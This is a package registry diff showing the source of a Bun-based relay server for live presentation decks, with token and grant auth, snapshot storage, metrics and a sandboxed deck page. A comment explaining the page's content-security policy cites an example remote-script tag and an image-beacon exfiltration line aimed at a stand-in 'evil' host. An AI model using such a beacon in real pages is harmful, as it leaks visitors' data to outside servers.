@liebstoeckel/present-relay 0.3.5
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/LICENSE +373 -0
- package/README.md +84 -0
- package/package.json +58 -0
- package/src/addressing.ts +37 -0
- package/src/auth.ts +28 -0
- package/src/cli.ts +111 -0
- package/src/grant.ts +63 -0
- package/src/index.ts +3 -0
- package/src/metrics.ts +152 -0
- package/src/relay-server.ts +546 -0
- package/src/tracing.ts +86 -0
|
@@ -0,0 +1,546 @@
|
|
|
1
|
+
import {
|
|
2
|
+
Hub,
|
|
3
|
+
createSession,
|
|
4
|
+
roleForToken,
|
|
5
|
+
injectBootstrap,
|
|
6
|
+
injectWatermark,
|
|
7
|
+
audienceScopeFromHtml,
|
|
8
|
+
type Peer,
|
|
9
|
+
type PeerRole,
|
|
10
|
+
type Role,
|
|
11
|
+
type Session,
|
|
12
|
+
} from "@liebstoeckel/live-server";
|
|
13
|
+
import { bearer, matchAccount, safeEqual } from "./auth";
|
|
14
|
+
import { mintGrant, verifyGrant } from "./grant";
|
|
15
|
+
import { createRelayMetrics } from "./metrics";
|
|
16
|
+
import { withSpan, SpanKind, ctxFromHeaders } from "./tracing";
|
|
17
|
+
|
|
18
|
+
/** Collapse per-session path segments into a fixed template so span names stay bounded:
 * `/api/sessions/<id>` → `/api/sessions/:id`, `/s/<id>` → `/s/:id`, `/sync/<id>` → `/sync/:id`.
 * Anything after the id segment is kept; paths that match neither pattern are returned as-is. */
function tracePath(pathname: string): string {
  const templates: ReadonlyArray<readonly [RegExp, string]> = [
    [/^\/api\/sessions\/[^/]+/, "/api/sessions/:id"],
    [/^\/(s|sync)\/[^/]+/, "/$1/:id"],
  ];
  let templated = pathname;
  for (const [pattern, replacement] of templates) {
    templated = templated.replace(pattern, replacement);
  }
  return templated;
}
|
|
25
|
+
|
|
26
|
+
/** Object-storage contract for session snapshots (ADR 0061). The relay core only talks to
 * this interface, so it stays storage-agnostic and testable; the hosted deploy wires a
 * Bun S3 client behind it. */
export interface RelayStorage {
  /** Read the bytes stored under `key`. The relay treats a `null` result as
   * "no prior snapshot" when seeding a new session. */
  get(key: string): Promise<Uint8Array | null>;

  /** Write `bytes` under `key`. */
  put(key: string, bytes: Uint8Array): Promise<void>;
}
|
|
32
|
+
|
|
33
|
+
/** Configuration accepted by `createRelay`. Only `accountTokens` is required; the
 * size/TTL/rate knobs fall back to the relay's built-in `DEFAULTS` when omitted. */
export interface RelayOptions {
  /** Pre-shared account API tokens; a POST must present one as `Bearer`.
   * `createRelay` throws when this list is empty. */
  accountTokens: readonly string[];

  /** Listen port (0 is used when omitted). */
  port?: number;

  /** Listen hostname ("0.0.0.0" is used when omitted). */
  hostname?: string;

  /** Public base URL for the links handed back (e.g. https://relay.example).
   * When omitted, links are derived from the request (honoring
   * x-forwarded-proto / x-forwarded-host). */
  publicBaseUrl?: string;

  /** Maximum uploaded deck size, in bytes. */
  maxDeckBytes?: number;

  /** Maximum concurrent sessions per account. */
  maxSessionsPerAccount?: number;

  /** Session lifetime in ms; the doc and its tokens are dropped after this. */
  sessionTtlMs?: number;

  /** Inbound WebSocket frame cap, in bytes. */
  maxFrameBytes?: number;

  /** Keepalive period (ms) for each session Hub. */
  keepaliveMs?: number;

  /** Object storage for session snapshots (ADR 0061). Sessions created with an
   * `x-snapshot-key` header are seeded from it on create and snapshotted to it on a
   * timer and on end. Absent → no persistence (the trusted/transient relay). */
  storage?: RelayStorage;

  /** Snapshot period (ms) for persisted sessions. */
  snapshotMs?: number;

  /** Per-audience-peer write rate, applied to enforced sessions. */
  audienceRate?: {
    capacity: number;
    refillPerSec: number;
  };

  /** Image tag reported by the `liebstoeckel_relay_build_info` metric (ADR 0073). */
  version?: string;
}
|
|
62
|
+
|
|
63
|
+
/** In-memory record the relay keeps for one live session. */
interface RelaySession {
  /** Session id; also the key in the relay's `sessions` map and the `/s/:id` path segment. */
  id: string;

  /** The account token that created the session; grants are minted and verified against it. */
  account: string;

  /** The per-session sync Hub that WebSocket peers join. */
  hub: Hub;

  /** The built deck HTML, stored without the bootstrap (that is injected per request). */
  html: string;

  /** Underlying live-server session carrying the raw presenter/viewer tokens. */
  session: Session;

  /** Privileged peer token: the local deck-runner that applies server-plugin effects. */
  runnerToken: string;

  /** Creation time, epoch ms. */
  createdAt: number;

  /** Effective lifetime (ms): the plan duration for hosted sessions (ADR 0061),
   * else the relay default. */
  ttlMs: number;

  /** Hosted live (ADR 0061): write-scope enforcement for audience peers. */
  enforce: boolean;

  /** Max concurrent audience peers (the plan's liveAudienceCap); undefined = uncapped. */
  audienceCap?: number;

  /** Currently connected audience peers, used to enforce the cap. */
  audienceCount: number;

  /** Show the "Published with liebstoeckel" provenance badge (free tier; ADR 0061). */
  watermark: boolean;

  /** Object-storage key for this session's Yjs snapshot, if persisted. */
  snapshotKey?: string;

  /** Expiry timer handle; cleared when the session is dropped. */
  ttl?: ReturnType<typeof setTimeout>;

  /** Periodic snapshot timer handle; only set for persisted sessions. */
  snap?: ReturnType<typeof setInterval>;
}
|
|
89
|
+
|
|
90
|
+
/** Handle returned by `createRelay` for a running relay instance. */
export interface RelayServer {
  /** The port the server is listening on. */
  port: number;

  /** Base URL for this relay: the configured public base URL when set, otherwise an
   * `http://<hostname>:<port>` address. */
  baseUrl: string;

  /** The live session table, keyed by session id. */
  sessions: Map<string, RelaySession>;

  /** Operational counters (ADR 0061 / ticket 0015): snapshot write failures, so a
   * silently-lost result surfaces in logs/metrics instead of vanishing. */
  stats(): { snapshotFailures: number };

  /** Flush every active session's final snapshot, then tear down. Awaitable so a
   * SIGTERM handler can guarantee the writes land before the process exits
   * (ADR 0071 §5 / ticket 0018; the earlier fire-and-forget path lost results). */
  stop(): Promise<void>;
}
|
|
102
|
+
|
|
103
|
+
/** Per-socket state attached at WebSocket upgrade time. */
type WSData = {
  /** Id of the session the socket was upgraded for. */
  sessionId: string;
  /** Hub peer handle; `null` until the socket has joined the session's Hub. */
  peer: Peer | null;
  /** Role the socket joins the Hub with. */
  role: PeerRole;
};
|
|
104
|
+
|
|
105
|
+
/** Random lowercase hex string built from `bytes` cryptographically random bytes
 * (two hex digits per byte, so the default of 16 bytes yields 32 characters). */
const hex = (bytes = 16): string => {
  const buf = new Uint8Array(bytes);
  crypto.getRandomValues(buf);
  let out = "";
  for (let i = 0; i < buf.length; i++) {
    out += buf[i]!.toString(16).padStart(2, "0");
  }
  return out;
};
|
|
110
|
+
|
|
111
|
+
/** Built-in values for every tunable in `RelayOptions` that has a default;
 * `createRelay` spreads the caller's options over these. */
const DEFAULTS = {
  // 8 MiB upload cap.
  maxDeckBytes: 8 * 2 ** 20,
  // Per-pod safety valve, NOT the platform ceiling (ADR 0071 §2 / ticket 0017): real
  // concurrency is gated by per-org entitlements + per-pod capacity in the control
  // plane's choosePod, and sessions spread across the StatefulSet's pods. This only
  // backstops a single pod's RAM.
  maxSessionsPerAccount: 200,
  // 6 hours.
  sessionTtlMs: 6 * 3_600_000,
  // 4 MiB inbound WebSocket frame cap.
  maxFrameBytes: 4 * 2 ** 20,
  // 25 s Hub keepalive.
  keepaliveMs: 25 * 1000,
  // 20 s between periodic snapshots.
  snapshotMs: 20 * 1000,
  audienceRate: { capacity: 20, refillPerSec: 5 },
};
|
|
124
|
+
|
|
125
|
+
/** Resolve the public http/ws origins for the links we return.
 *
 * With `opts.publicBaseUrl` set, that value (minus one trailing slash) is the http origin
 * and its `http`/`https` scheme is swapped for `ws`/`wss`. Otherwise the origin is derived
 * from the request: `x-forwarded-proto` / `x-forwarded-host` win over the request URL.
 *
 * Forwarding headers may carry a comma-separated list when the request crossed several
 * proxies; only the first entry is used, an empty value falls back to the request URL,
 * and the protocol is lower-cased before it selects `ws` vs `wss`.
 *
 * @param req  the incoming request
 * @param opts relay options (only `publicBaseUrl` is read)
 * @returns the `http` and `ws` origins, without a trailing slash
 */
function originOf(req: Request, opts: RelayOptions): { http: string; ws: string } {
  if (opts.publicBaseUrl) {
    const base = opts.publicBaseUrl.replace(/\/$/, "");
    return { http: base, ws: base.replace(/^http/i, "ws") };
  }

  // First non-empty entry of a (possibly comma-separated) forwarding header.
  const forwarded = (name: string): string | undefined =>
    req.headers.get(name)?.split(",")[0]?.trim() || undefined;

  const url = new URL(req.url);
  const proto = forwarded("x-forwarded-proto")?.toLowerCase() ?? (url.protocol === "https:" ? "https" : "http");
  const host = forwarded("x-forwarded-host") ?? url.host;
  return { http: `${proto}://${host}`, ws: `${proto === "https" ? "wss" : "ws"}://${host}` };
}
|
|
136
|
+
|
|
137
|
+
/** Build a JSON `Response`: `body` is serialized with `JSON.stringify` and sent with
 * `content-type: application/json` and the given status (200 by default). */
const json = (body: unknown, status = 200): Response => {
  const payload = JSON.stringify(body);
  const headers = { "content-type": "application/json" };
  return new Response(payload, { status, headers });
};
|
|
139
|
+
|
|
140
|
+
/** Map a raw token to a role within session `s`: `"runner"` when it equals the session's
 * runner token (compared via `safeEqual`), otherwise whatever `roleForToken` reports for
 * the session's presenter/viewer tokens. A missing or empty token is denied (`null`). */
function relayRole(s: RelaySession, token: string | null): Role | "runner" | null {
  if (token === null || token === "") return null;
  return safeEqual(s.runnerToken, token) ? "runner" : roleForToken(s.session, token);
}
|
|
147
|
+
|
|
148
|
+
/** Resolve a connection's role from its `?t=…` token, preferring a **signed grant**
 * (ADR 0061): the token is first verified as a grant against the session's account
 * token, and a valid grant for this session with role presenter or viewer decides the
 * role without any per-session token lookup. Anything else falls back to the raw
 * session tokens (CLI presenter/viewer) and the runner token. `null` means deny.
 *
 * @param s     the session being accessed
 * @param token the presented token, or null when absent
 * @param now   current time passed to grant verification
 */
function resolveRole(s: RelaySession, token: string | null, now: number): Role | "runner" | null {
  if (!token) return null;

  const grant = verifyGrant(token, s.account, now);
  if (grant && grant.session === s.id) {
    if (grant.role === "presenter" || grant.role === "viewer") return grant.role;
  }

  return relayRole(s, token);
}
|
|
158
|
+
|
|
159
|
+
/** A public relay: account-token-gated deck upload, opaque-origin deck serving,
|
|
160
|
+
* and a token-gated Yjs WebSocket per session. Decks run their code locally (the
|
|
161
|
+
* runner connects as a privileged peer); the relay only relays + serves bytes. */
|
|
162
|
+
export function createRelay(opts: RelayOptions): RelayServer {
|
|
163
|
+
const cfg = { ...DEFAULTS, ...opts };
|
|
164
|
+
if (!opts.accountTokens.length) throw new Error("createRelay: at least one account token is required");
|
|
165
|
+
const sessions = new Map<string, RelaySession>();
|
|
166
|
+
let snapshotFailures = 0;
|
|
167
|
+
// Process start time, reported in /stats so the reconciler can tell when a pod has
|
|
168
|
+
// RESTARTED (same name, fresh memory) and re-provision sessions it lost, not just when
|
|
169
|
+
// a pod is gone (ADR 0071 §5 / ticket 0018+0019).
|
|
170
|
+
const startedAt = Date.now();
|
|
171
|
+
// Drain flag (ADR 0071 §4 / ticket 0019): the reconciler cordons a pod (POST /cordon)
|
|
172
|
+
// to stop NEW placement while existing sessions finish. Reported in /stats so the
|
|
173
|
+
// control plane's choosePod skips it; in-memory, so a recreated pod starts uncordoned.
|
|
174
|
+
let cordoned = false;
|
|
175
|
+
|
|
176
|
+
// Metrics (ADR 0073 / ticket 0023). Per-instance registry; scrape-time gauges are read
|
|
177
|
+
// from the live `sessions` map. Served bearer-gated at GET /metrics below.
|
|
178
|
+
const metrics = createRelayMetrics(opts.version ?? process.env.PRESENT_RELAY_VERSION ?? "unknown");
|
|
179
|
+
// Scrape-time gauges: recomputed from the live `sessions` map each time the registry collects.
metrics.registry.onCollect(() => {
  const live = [...sessions.values()];
  const audience = live.reduce((sum, s) => sum + s.audienceCount, 0);
  const deckBytes = live.reduce((sum, s) => sum + Buffer.byteLength(s.html, "utf8"), 0);

  metrics.sessions.set(sessions.size);
  metrics.audiencePeers.set(audience);
  metrics.deckBytes.set(deckBytes);
  metrics.cordoned.set(cordoned ? 1 : 0);
  // Process start time is reported in whole seconds.
  metrics.startedAt.set(Math.floor(startedAt / 1000));
});
|
|
192
|
+
|
|
193
|
+
// Write session `s`'s current Hub snapshot to object storage. No-op when the relay has
// no storage or the session has no snapshot key. Never rejects on a failed write: the
// failure is counted and logged instead.
const persist = async (s: RelaySession) => {
  const store = cfg.storage;
  const key = s.snapshotKey;
  if (!store || !key) return;

  metrics.snapshotWrites.inc();
  try {
    await store.put(key, s.hub.snapshot());
  } catch (e) {
    // Best-effort: a failed write must never crash the relay, but it must NOT be
    // silent (results would vanish). Structured log + a counter (ADR 0061).
    snapshotFailures++;
    metrics.snapshotFailures.inc();
    const entry = { level: "error", msg: "relay snapshot persist failed", key, err: String(e) };
    console.error(JSON.stringify(entry));
  }
};
|
|
208
|
+
|
|
209
|
+
// End a session: remove it from the table, cancel its timers, then write a final
// snapshot and destroy the Hub once that write has settled. The persist is
// fire-and-forget; callers do not wait for it.
const dropSession = (s: RelaySession) => {
  sessions.delete(s.id);
  if (s.snap) clearInterval(s.snap);
  if (s.ttl) clearTimeout(s.ttl);

  // Snapshot the final state before tearing down the doc (results survive, ADR 0061).
  const destroyHub = () => s.hub.destroy();
  void persist(s).finally(destroyHub);
};
|
|
216
|
+
|
|
217
|
+
// POST /api/sessions: create a live session from an uploaded deck (ADR 0061). A closure over
// cfg/sessions/metrics/persist; returns the session-info JSON, or a reject response
// (401/503/413/400/429/409). The 401/503/413/400/429 rejects increment `sessionRejects`.
//
// Request headers read here:
//   authorization     bearer account token (required)
//   content-length    declared deck size, pre-checked against maxDeckBytes
//   x-live-enforce    "1" → audience write-scope enforcement
//   x-snapshot-key    object-storage key for the Yjs snapshot
//   x-session-ttl-ms  plan duration, clamped to the relay's sessionTtlMs
//   x-audience-cap    max concurrent audience peers
//   x-watermark       "1" → provenance badge on the viewer page
//   x-session-id      stable id to (re-)create the session under
const handleCreateSession = async (req: Request): Promise<Response> => {
  const account = matchAccount(cfg.accountTokens, bearer(req));
  if (!account) {
    metrics.sessionRejects.inc({ reason: "unauthorized" });
    return json({ error: "unauthorized" }, 401);
  }
  // Cordoned pods take no new sessions; this is a backstop, placement already skips us.
  if (cordoned) {
    metrics.sessionRejects.inc({ reason: "cordoned" });
    return json({ error: "relay draining" }, 503);
  }

  // Cheap pre-check on the declared size, then the authoritative check on the bytes read.
  const declared = Number(req.headers.get("content-length") ?? "0");
  if (declared > cfg.maxDeckBytes) {
    metrics.sessionRejects.inc({ reason: "too_large" });
    return json({ error: "deck too large" }, 413);
  }
  const html = await req.text();
  if (Buffer.byteLength(html, "utf8") > cfg.maxDeckBytes) {
    metrics.sessionRejects.inc({ reason: "too_large" });
    return json({ error: "deck too large" }, 413);
  }
  if (!html.trim()) {
    metrics.sessionRejects.inc({ reason: "empty" });
    return json({ error: "empty deck" }, 400);
  }

  const count = [...sessions.values()].filter((s) => s.account === account).length;
  if (count >= cfg.maxSessionsPerAccount) {
    metrics.sessionRejects.inc({ reason: "quota" });
    return json({ error: "session quota reached" }, 429);
  }

  // Hosted live (ADR 0061): the control plane opts a session into audience
  // write-scope enforcement (scope read from the deck's own embedded manifest)
  // and names the object-storage key its Yjs snapshot persists to.
  const enforce = req.headers.get("x-live-enforce") === "1";
  const snapshotKey = req.headers.get("x-snapshot-key") || undefined;
  // Plan limits the control plane passes per session (ADR 0061): the duration
  // (so a free session's link dies on time, not at the relay's 6h default) and
  // the audience cap. TTL is clamped to the relay max; absent → relay default.
  const reqTtl = Number(req.headers.get("x-session-ttl-ms") ?? "");
  const ttlMs = Number.isFinite(reqTtl) && reqTtl > 0 ? Math.min(reqTtl, cfg.sessionTtlMs) : cfg.sessionTtlMs;
  const capHdr = Number(req.headers.get("x-audience-cap") ?? "");
  const audienceCap = Number.isFinite(capHdr) && capHdr > 0 ? capHdr : undefined;
  const watermark = req.headers.get("x-watermark") === "1";
  // Stable session id across re-provision (ADR 0072): the control plane re-creates
  // a recovered session under the SAME id on a new pod, so the audience URL
  // (`/s/<id>?t=<grant>`) and its stateless grant stay valid; only the pod the
  // multi-layer ForwardAuth route resolves to changes. Absent (CLI) → relay mints one.
  const providedId = (req.headers.get("x-session-id") || "").trim() || undefined;

  // A stale entry under this id means re-provision raced its predecessor's teardown.
  const stale = providedId ? sessions.get(providedId) : undefined;
  if (stale && stale.account !== account) {
    // Only the owning account may replace a live session (same ownership rule as
    // DELETE /api/sessions/:id); otherwise any account could evict another's session.
    // NOTE(review): no `sessionRejects` reason is visible here for this case, so it is
    // not counted; add a label in the metrics module if it should be.
    return json({ error: "session id in use" }, 409);
  }

  const session = createSession();
  if (providedId) session.id = providedId;
  if (stale) {
    // Retire the predecessor and WAIT for its final snapshot before re-seeding below.
    // A fire-and-forget persist here could still be in flight when the new Hub reads
    // the same key, so the new session would be seeded from the previous, older snapshot.
    if (stale.ttl) clearTimeout(stale.ttl);
    if (stale.snap) clearInterval(stale.snap);
    sessions.delete(stale.id);
    try {
      await persist(stale);
    } finally {
      stale.hub.destroy();
    }
  }

  const hub = new Hub({
    keepaliveMs: cfg.keepaliveMs,
    audience: enforce ? { scope: audienceScopeFromHtml(html), rate: cfg.audienceRate } : undefined,
  });
  // Re-seed from a prior snapshot if one exists (relay restart / reconnect).
  if (cfg.storage && snapshotKey) {
    try {
      const prior = await cfg.storage.get(snapshotKey);
      if (prior) {
        hub.seed(prior);
        metrics.snapshotSeed.inc({ result: "hit" });
      } else {
        metrics.snapshotSeed.inc({ result: "miss" });
      }
    } catch {
      /* unreadable snapshot → start fresh, but count it */
      metrics.snapshotSeed.inc({ result: "error" });
    }
  }

  const rs: RelaySession = {
    id: session.id,
    account,
    hub,
    html,
    session,
    runnerToken: hex(),
    createdAt: Date.now(),
    ttlMs,
    enforce,
    audienceCap,
    audienceCount: 0,
    watermark,
    snapshotKey,
  };
  // Timers are unref'd (where supported) so they never keep the process alive.
  rs.ttl = setTimeout(() => dropSession(rs), ttlMs);
  (rs.ttl as { unref?: () => void }).unref?.();
  if (cfg.storage && snapshotKey) {
    rs.snap = setInterval(() => void persist(rs), cfg.snapshotMs);
    (rs.snap as { unref?: () => void }).unref?.();
  }
  sessions.set(rs.id, rs);
  metrics.sessionCreates.inc();

  // Mint signed, expiring presenter/viewer grants (ADR 0061): the links carry
  // these, and the relay verifies them statelessly with the account token; no
  // per-session token is stored client-side. (Raw tokens are still returned for
  // CLI/runner back-compat.)
  const exp = rs.createdAt + ttlMs;
  const presenterGrant = mintGrant({ session: rs.id, role: "presenter", exp }, account);
  const viewerGrant = mintGrant({ session: rs.id, role: "viewer", exp }, account);

  const { http, ws } = originOf(req, opts);
  return json({
    id: rs.id,
    presenterToken: session.presenterToken,
    viewerToken: session.viewerToken,
    runnerToken: rs.runnerToken,
    presenterGrant,
    viewerGrant,
    expiresAt: exp,
    urls: {
      presenter: `${http}/s/${rs.id}?t=${presenterGrant}`,
      viewer: `${http}/s/${rs.id}?t=${viewerGrant}`,
      sync: `${ws}/sync/${rs.id}`,
    },
  });
};
|
|
347
|
+
|
|
348
|
+
// GET /s/:id: serve the deck to a grant-bearing presenter/viewer in an opaque sandbox
// (ADR 0014/0069). A closure over sessions/metrics/opts; returns the bootstrapped HTML, or
// a 403 (counted in `grantDenials`) for an unknown session or a missing/invalid/expired
// token. Runner tokens are WS-only and may not load the page.
const serveDeck = (req: Request, url: URL, id: string): Response => {
  const deny = (): Response => {
    metrics.grantDenials.inc();
    return new Response("Invalid or expired link.", { status: 403 });
  };

  const s = sessions.get(id);
  if (!s) return deny();
  const token = url.searchParams.get("t");
  const role = resolveRole(s, token, Date.now());
  if (!token || !role || role === "runner") return deny();

  const origin = originOf(req, opts);
  const wsUrl = `${origin.ws}/sync/${s.id}?t=${token}`;
  const viewer = `${origin.http}/s/${s.id}?t=${s.session.viewerToken}`;
  // Free-tier provenance badge on the public audience view (ADR 0061); paid
  // (white-label) sessions omit it. The presenter view is never watermarked.
  const deckHtml = s.watermark && role === "viewer" ? injectWatermark(s.html) : s.html;
  const body = injectBootstrap(deckHtml, { ws: wsUrl, session: s.id, role, token, participant: "", viewer });

  // Opaque-origin isolation: the sandbox has no allow-same-origin, so the deck can't
  // reach the relay's cookies/API/DOM, and each load is a fresh opaque origin
  // (deck-to-deck isolation). connect-src pins the live socket to us.
  //
  // `allow-popups` enables the presenter pop-out (P → window.open of
  // /s/:id?t=<presenterToken>#presenter); the popup is itself served sandboxed by the
  // relay and syncs through the Hub, so isolation holds (ADR 0014). Without it,
  // window.open throws in the sandbox.
  //
  // `allow-fullscreen` is NOT a valid CSP `sandbox` token (it's an iframe /
  // Permissions-Policy feature); browsers reject it and log a console error.
  // Fullscreen for this top-level doc is governed by the Fullscreen API /
  // Permissions-Policy, not the sandbox directive.
  //
  // `default-src 'none'` + a single-file allowlist (ADR 0069): a deck inlines all
  // assets (ADR 0001), so it needs zero external origins. This blocks remote code
  // (`<script src=evil>`) and GET-beacon exfil (`new Image().src='https://evil/?x'`)
  // that `connect-src` can't pin. Mirrors the dashboard's static-share CSP, but keeps
  // `connect-src` to our sync socket and `allow-popups` for the presenter pop-out.
  const csp = [
    "default-src 'none'",
    "script-src 'unsafe-inline'",
    "style-src 'unsafe-inline'",
    "img-src data: blob:",
    "font-src data:",
    "media-src data: blob:",
    `connect-src ${origin.ws} ${origin.http}`,
    "frame-ancestors 'none'",
    "sandbox allow-scripts allow-popups",
  ].join("; ");

  return new Response(body, {
    headers: {
      "content-type": "text/html; charset=utf-8",
      "content-security-policy": csp,
      "x-content-type-options": "nosniff",
      "referrer-policy": "no-referrer",
    },
  });
};
|
|
392
|
+
|
|
393
|
+
// HTTP dispatcher: a closure (keeps access to sessions/cfg/cordoned), wrapped in a SERVER span
// by the Bun.serve `fetch` below. Returns a Response, or undefined for a successful WebSocket
// upgrade (Bun's hold-the-socket signal). The two fat routes live in their own closures above;
// the small infra/control + connect routes stay inline.
//
// Routes, in match order:
//   /healthz                   liveness, unauthenticated
//   /stats                     pod load (bearer)
//   /metrics                   Prometheus text (bearer)
//   POST /cordon               drain flag (bearer)
//   POST /api/sessions         create a session
//   DELETE /api/sessions/:id   end a session (bearer, owner only)
//   /sync/:id                  WebSocket upgrade (token in ?t=)
//   /s/:id                     sandboxed deck page (token in ?t=)
//   anything else              404
const handleFetch = async (req: Request, srv: Bun.Server<WSData>): Promise<Response | undefined> => {
  const url = new URL(req.url);
  const { pathname } = url;

  if (pathname === "/healthz") return new Response("ok");

  // --- fleet stats: this pod's live load, for control-plane placement (ADR 0071 §2). ---
  // Account-gated, since the per-pod Ingress makes it publicly reachable.
  if (pathname === "/stats") {
    if (!matchAccount(cfg.accountTokens, bearer(req))) return json({ error: "unauthorized" }, 401);
    return json({ ok: true, sessions: sessions.size, cordoned, startedAt });
  }

  // --- Prometheus metrics: this pod's logical state (ADR 0073). Account-gated like /stats, so
  // the bearer keeps it off the public surface; Alloy scrapes it on the pod network. ---
  if (pathname === "/metrics") {
    if (!matchAccount(cfg.accountTokens, bearer(req))) return new Response("unauthorized", { status: 401 });
    return new Response(metrics.registry.render(), {
      headers: { "content-type": "text/plain; version=0.0.4; charset=utf-8" },
    });
  }

  // --- drain control: cordon/uncordon this pod (reconciler only, ADR 0071 §4). Cordoned →
  // refuse NEW sessions; existing run to completion. `{ "cordoned": false }` lifts it. ---
  if (pathname === "/cordon" && req.method === "POST") {
    if (!matchAccount(cfg.accountTokens, bearer(req))) return json({ error: "unauthorized" }, 401);
    // The body is untrusted JSON: it may be absent, malformed, `null`, or a primitive.
    // Only an object with `cordoned === false` lifts the cordon; everything else sets it.
    // (Reading `.cordoned` straight off a parsed `null` body would throw.)
    const body: unknown = await req.json().catch(() => null);
    const lift =
      typeof body === "object" && body !== null && (body as { cordoned?: unknown }).cordoned === false;
    cordoned = !lift;
    return json({ ok: true, cordoned });
  }

  // --- control API: create / end a session (ADR 0061). ---
  if (pathname === "/api/sessions" && req.method === "POST") return handleCreateSession(req);
  const del = pathname.match(/^\/api\/sessions\/([^/]+)$/);
  if (del && req.method === "DELETE") {
    const account = matchAccount(cfg.accountTokens, bearer(req));
    if (!account) return json({ error: "unauthorized" }, 401);
    const s = sessions.get(del[1]!);
    // A session owned by another account is reported as not found.
    if (!s || s.account !== account) return json({ error: "not found" }, 404);
    dropSession(s);
    return new Response(null, { status: 204 });
  }

  // --- WebSocket sync: audience/presenter connect (ADR 0061). ---
  const sync = pathname.match(/^\/sync\/([^/]+)$/);
  if (sync) {
    const s = sessions.get(sync[1]!);
    const relRole = s ? resolveRole(s, url.searchParams.get("t"), Date.now()) : null;
    if (!s || !relRole) {
      metrics.grantDenials.inc();
      return new Response("forbidden", { status: 403 });
    }
    // viewer → audience (write-scope enforced when the session opted in);
    // presenter + runner are trusted writers.
    const role: PeerRole = relRole === "viewer" ? "audience" : "presenter";
    // Enforce the plan's audience cap (ADR 0061); presenter/runner never count.
    if (role === "audience" && s.audienceCap !== undefined && s.audienceCount >= s.audienceCap) {
      metrics.audienceCapRejects.inc();
      return new Response("audience full", { status: 503 });
    }
    const data: WSData = { sessionId: s.id, peer: null, role };
    return srv.upgrade(req, { data }) ? undefined : new Response("upgrade failed", { status: 400 });
  }

  // --- serve the deck in an opaque sandbox (ADR 0014/0069). ---
  const serve = pathname.match(/^\/s\/([^/]+)$/);
  if (serve) return serveDeck(req, url, serve[1]!);

  return new Response("not found", { status: 404 });
};
|
|
467
|
+
|
|
468
|
+
// The Bun HTTP + WebSocket server. `fetch` routes through `handleFetch`; the websocket
// handlers bridge each socket to its session's Hub and keep the connection metrics and
// per-session audience count in step.
const server = Bun.serve<WSData>({
  port: opts.port ?? 0,
  hostname: opts.hostname ?? "0.0.0.0",
  // OSS-safe ingress tracing: gated by OTEL_EXPORTER_OTLP_ENDPOINT (a no-op with NO egress when
  // unset, so a standalone/offline relay emits nothing). A SERVER span continuing the inbound W3C
  // traceparent so the relay JOINS the trace: control → relay (session create) and the audience
  // traefik → relay path. Infra/control paths (probes, scrapes, cordon) are not traced.
  fetch(req, srv) {
    const { pathname } = new URL(req.url);
    if (pathname === "/healthz" || pathname === "/stats" || pathname === "/metrics" || pathname === "/cordon") {
      return handleFetch(req, srv);
    }
    return withSpan(
      `relay ${req.method} ${tracePath(pathname)}`,
      ctxFromHeaders(req.headers),
      { "http.request.method": req.method, "url.path": pathname },
      () => handleFetch(req, srv),
      SpanKind.SERVER,
    );
  },
  websocket: {
    idleTimeout: 120,
    maxPayloadLength: cfg.maxFrameBytes,
    open(socket) {
      const s = sessions.get(socket.data.sessionId);
      if (!s) {
        // The session ended between the upgrade and `open`. Close without counting the
        // socket anywhere; `peer` stays null, which `close` uses to skip the bookkeeping.
        socket.close();
        return;
      }
      if (socket.data.role === "audience") s.audienceCount++;
      metrics.wsOpens.inc({ role: socket.data.role });
      metrics.wsConnections.inc({ role: socket.data.role });
      // Frames the Hub sends to this peer are counted and forwarded to the socket.
      socket.data.peer = s.hub.join((d) => {
        metrics.wsFrames.inc({ dir: "out" });
        metrics.wsBytes.inc({ dir: "out" }, d.byteLength);
        socket.send(d);
      }, socket.data.role);
    },
    message(socket, msg) {
      // Only binary frames are relayed; text frames are ignored.
      if (typeof msg === "string") return;
      const bytes = new Uint8Array(msg as unknown as ArrayBufferLike);
      if (bytes.byteLength > cfg.maxFrameBytes) return;
      metrics.wsFrames.inc({ dir: "in" });
      metrics.wsBytes.inc({ dir: "in" }, bytes.byteLength);
      socket.data.peer?.recv(bytes);
    },
    close(socket) {
      const { peer, role, sessionId } = socket.data;
      // A socket that never joined a Hub (rejected in `open`) was never counted in
      // wsOpens / wsConnections / audienceCount. Decrementing for it would drive the
      // connection gauge negative and undercount the audience, so skip the bookkeeping.
      if (!peer) return;
      peer.leave();
      metrics.wsCloses.inc({ role });
      metrics.wsConnections.dec({ role });
      const s = sessions.get(sessionId);
      if (s && role === "audience" && s.audienceCount > 0) s.audienceCount--;
    },
  },
});
|
|
523
|
+
|
|
524
|
+
const port = server.port ?? 0;
// The public handle: listening port, base URL, the live session table, counters, and
// an awaitable graceful shutdown.
return {
  port,
  baseUrl: opts.publicBaseUrl?.replace(/\/$/, "") ?? `http://${opts.hostname ?? "0.0.0.0"}:${port}`,
  sessions,
  stats: () => ({ snapshotFailures }),
  async stop() {
    // Refuse new sessions while shutting down, so none is created mid-flush and then
    // torn down without ever being snapshotted.
    cordoned = true;
    // Flush every active session's final snapshot and AWAIT the writes before
    // tearing down. The old path fired `dropSession` (un-awaited persist) then
    // returned, so a SIGTERM + process.exit raced the S3 PUTs and lost the last
    // interval's state. Now a graceful shutdown is lossless (ADR 0071 §5).
    await Promise.allSettled([...sessions.values()].map((s) => persist(s)));
    // Iterate a copy of the current table: entries are deleted while looping.
    for (const s of [...sessions.values()]) {
      if (s.ttl) clearTimeout(s.ttl);
      if (s.snap) clearInterval(s.snap);
      sessions.delete(s.id);
      s.hub.destroy();
    }
    // `stop(true)` force-closes active connections; await it so the caller's
    // `await stop()` covers the socket teardown as well.
    await server.stop(true);
  },
};
|
|
546
|
+
}
|
package/src/tracing.ts
ADDED
|
@@ -0,0 +1,86 @@
|
|
|
1
|
+
import { trace, context, propagation, SpanStatusCode, SpanKind, type Span, type Context } from "@opentelemetry/api";
|
|
2
|
+
import { BasicTracerProvider, BatchSpanProcessor } from "@opentelemetry/sdk-trace-base";
|
|
3
|
+
|
|
4
|
+
// Re-export so call sites set span kind via the tracing module (centralized OTel access).
|
|
5
|
+
export { SpanKind };
|
|
6
|
+
import { OTLPTraceExporter } from "@opentelemetry/exporter-trace-otlp-http";
|
|
7
|
+
import { resourceFromAttributes } from "@opentelemetry/resources";
|
|
8
|
+
import { ATTR_SERVICE_NAME, ATTR_SERVICE_VERSION } from "@opentelemetry/semantic-conventions";
|
|
9
|
+
